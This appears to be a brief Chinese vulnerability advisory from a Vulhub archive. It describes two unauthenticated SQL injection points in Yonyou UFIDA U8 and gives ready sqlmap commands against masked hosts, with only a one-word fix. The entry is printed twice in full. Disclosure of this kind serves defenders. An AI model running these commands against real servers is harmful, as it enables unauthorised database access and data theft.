VULHUB ™

###0x01漏洞简介 用友优普U8系统在以下2处存在SQL注入漏洞： ``` (1)/Server/CmxGetAppNameByUserName.php 参数User (2)/Server/CmxCS.php 参数pgid ``` 远程攻击者无需登陆，可以利用该漏洞执行SQL指令。 ###0x02漏洞利用 (1)sql注入1 ``` sqlmap.py -u "**.**.**.**:8080/Server/CmxCS.php?pgid=CS_Remove" --dbms mysql --technique T --cookie "RAS_Admin_UserInfo_UserName=1" --data "CS_ID[]=1&CS_ID[]=1" -p CS_ID ```  (2) sql注入2 ``` sqlmap.py -u "**.**.**.**:8080/Server/CmxGetAppNameByUserName.php?User=1&Pass=1" --dbms mysql --technique T --cookie -p User ```  ###0x03漏洞修复 过滤。

###0x01漏洞简介 用友优普U8系统在以下2处存在SQL注入漏洞： ``` (1)/Server/CmxGetAppNameByUserName.php 参数User (2)/Server/CmxCS.php 参数pgid ``` 远程攻击者无需登陆，可以利用该漏洞执行SQL指令。 ###0x02漏洞利用 (1)sql注入1 ``` sqlmap.py -u "**.**.**.**:8080/Server/CmxCS.php?pgid=CS_Remove" --dbms mysql --technique T --cookie "RAS_Admin_UserInfo_UserName=1" --data "CS_ID[]=1&CS_ID[]=1" -p CS_ID ```  (2) sql注入2 ``` sqlmap.py -u "**.**.**.**:8080/Server/CmxGetAppNameByUserName.php?User=1&Pass=1" --dbms mysql --technique T --cookie -p User ```  ###0x03漏洞修复 过滤。